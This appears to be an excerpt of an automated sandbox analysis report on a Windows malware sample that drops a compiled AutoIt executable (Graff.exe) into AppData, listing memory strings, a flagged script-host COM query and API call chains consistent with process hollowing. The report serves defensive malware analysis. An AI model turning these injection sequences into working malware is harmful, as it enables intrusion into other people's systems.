Source: bwYw3UUfy7.exe, 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cc528a40-7
Source: bwYw3UUfy7.exe, 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_26a8f4e8-d
Source: Graff.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Graff.exe, 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_00e4c1f0-7
Source: Graff.exe, 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_dc7958be-4
Source: Graff.exe, 0000000A.00000002.1511230717.0000000000932000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ed8045c1-5
Source: Graff.exe, 0000000A.00000002.1511230717.0000000000932000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_74423243-e

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00733170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,I_RpcFreeBuffer,PostQuitMessage,SetFocus,MoveWindow,	0_2_00733170
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00749052 NtdllDialogWndProc_W,	0_2_00749052
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007490A7 NtdllDialogWndProc_W,	0_2_007490A7
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C90A1 SendMessageW,NtdllDialogWndProc_W,	0_2_007C90A1
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_007C911E
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007CA2D7 NtdllDialogWndProc_W,	0_2_007CA2D7
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C93CB NtdllDialogWndProc_W,	0_2_007C93CB
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C9380 NtdllDialogWndProc_W,	0_2_007C9380
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C9400 ClientToScreen,NtdllDialogWndProc_W,	0_2_007C9400
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_007C9576
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C953A GetWindowLongW,NtdllDialogWndProc_W,	0_2_007C953A
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007497C0 GetParent,NtdllDialogWndProc_W,	0_2_007497C0
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C8AAA NtdllDialogWndProc_W,	0_2_007C8AAA
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C8B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_007C8B02
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00748BA4 NtdllDialogWndProc_W,	0_2_00748BA4
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C8D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,	0_2_007C8D0E
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C9E74 NtdllDialogWndProc_W,	0_2_007C9E74
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C9EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	0_2_007C9EF3
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C8FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_007C8FC9
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C9F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_007C9F86
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	2_2_00417245
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	2_2_0041CA9E
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,	2_2_0041ACC1
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,	2_2_0041ACED
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00873170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,I_RpcFreeBuffer,PostQuitMessage,SetFocus,MoveWindow,	2_2_00873170
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_008890A7 NtdllDialogWndProc_W,	2_2_008890A7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_009090A1 SendMessageW,NtdllDialogWndProc_W,	2_2_009090A1
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00889052 NtdllDialogWndProc_W,	2_2_00889052
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0090911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	2_2_0090911E
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0090A2D7 NtdllDialogWndProc_W,	2_2_0090A2D7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00909380 NtdllDialogWndProc_W,	2_2_00909380
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_009093CB NtdllDialogWndProc_W,	2_2_009093CB
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00909400 ClientToScreen,NtdllDialogWndProc_W,	2_2_00909400
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0090953A GetWindowLongW,NtdllDialogWndProc_W,	2_2_0090953A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00909576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	2_2_00909576
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_008897C0 GetParent,NtdllDialogWndProc_W,	2_2_008897C0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0088997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,74D2C8D0,NtdllDialogWndProc_W,	2_2_0088997D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00908AAA NtdllDialogWndProc_W,	2_2_00908AAA
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00888BA4 NtdllDialogWndProc_W,	2_2_00888BA4
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00908B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	2_2_00908B02
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00908D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,	2_2_00908D0E
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00909EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	2_2_00909EF3
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00909E74 NtdllDialogWndProc_W,	2_2_00909E74
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00909F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	2_2_00909F86
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00908FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	2_2_00908FC9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	4_2_0040DD85
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00401806 NtdllDefWindowProc_W,	4_2_00401806
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_004018C0 NtdllDefWindowProc_W,	4_2_004018C0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_004016FD NtdllDefWindowProc_A,	6_2_004016FD
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_004017B7 NtdllDefWindowProc_A,	6_2_004017B7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00402CAC NtdllDefWindowProc_A,	7_2_00402CAC
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00402D66 NtdllDefWindowProc_A,	7_2_00402D66
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	10_2_0041CA9E
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,	10_2_0041ACC1
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,	10_2_0041ACED

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,		2_2_004158B9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,		10_2_004158B9

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0075E1E0	0_2_0075E1E0
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007391C0	0_2_007391C0
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00751394	0_2_00751394
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00751706	0_2_00751706
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C4873	0_2_007C4873
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0075781B	0_2_0075781B
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00737920	0_2_00737920
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007519B0	0_2_007519B0
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00757A4A	0_2_00757A4A
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0073CAF0	0_2_0073CAF0
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00751C77	0_2_00751C77
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00751F32	0_2_00751F32
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0074AFAC	0_2_0074AFAC
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_017205B0	0_2_017205B0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041D071	2_2_0041D071
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004520D2	2_2_004520D2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0043D098	2_2_0043D098
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00437150	2_2_00437150
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004361AA	2_2_004361AA
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00426254	2_2_00426254
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00431377	2_2_00431377
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0043651C	2_2_0043651C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041E5DF	2_2_0041E5DF
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0044C739	2_2_0044C739
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004367C6	2_2_004367C6
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004267CB	2_2_004267CB
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0043C9DD	2_2_0043C9DD
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00432A49	2_2_00432A49
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00436A8D	2_2_00436A8D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0043CC0C	2_2_0043CC0C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00436D48	2_2_00436D48
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00434D22	2_2_00434D22
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00426E73	2_2_00426E73
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00440E20	2_2_00440E20
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0043CE3B	2_2_0043CE3B
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00412F45	2_2_00412F45
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00452F00	2_2_00452F00
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00426FAD	2_2_00426FAD
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_008791C0	2_2_008791C0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0089E1E0	2_2_0089E1E0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00891394	2_2_00891394
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00891706	2_2_00891706
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0089781B	2_2_0089781B
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00904873	2_2_00904873
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_008919B0	2_2_008919B0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00877920	2_2_00877920
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0088997D	2_2_0088997D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0087CAF0	2_2_0087CAF0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00897A4A	2_2_00897A4A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00897CA7	2_2_00897CA7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00891C77	2_2_00891C77
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0088AFAC	2_2_0088AFAC
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00891F32	2_2_00891F32
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_10017194	2_2_10017194
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_1000B5C1	2_2_1000B5C1
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0147A280	2_2_0147A280
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044B040	4_2_0044B040
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0043610D	4_2_0043610D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00447310	4_2_00447310
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044A490	4_2_0044A490
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0040755A	4_2_0040755A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0043C560	4_2_0043C560
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044B610	4_2_0044B610
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044D6C0	4_2_0044D6C0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_004476F0	4_2_004476F0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044B870	4_2_0044B870
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044081D	4_2_0044081D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00414957	4_2_00414957
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_004079EE	4_2_004079EE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00407AEB	4_2_00407AEB
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044AA80	4_2_0044AA80
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00412AA9	4_2_00412AA9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00404B74	4_2_00404B74
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00404B03	4_2_00404B03
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044BBD8	4_2_0044BBD8
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00404BE5	4_2_00404BE5
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00404C76	4_2_00404C76
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00415CFE	4_2_00415CFE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00416D72	4_2_00416D72
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00446D30	4_2_00446D30
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00446D8B	4_2_00446D8B
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00406E8F	4_2_00406E8F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00405038	6_2_00405038
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0041208C	6_2_0041208C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_004050A9	6_2_004050A9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0040511A	6_2_0040511A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0043C13A	6_2_0043C13A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_004051AB	6_2_004051AB
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00449300	6_2_00449300
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0040D322	6_2_0040D322
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0044A4F0	6_2_0044A4F0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0043A5AB	6_2_0043A5AB
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00413631	6_2_00413631
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00446690	6_2_00446690
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0044A730	6_2_0044A730
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_004398D8	6_2_004398D8
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_004498E0	6_2_004498E0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0044A886	6_2_0044A886
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0043DA09	6_2_0043DA09
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00438D5E	6_2_00438D5E
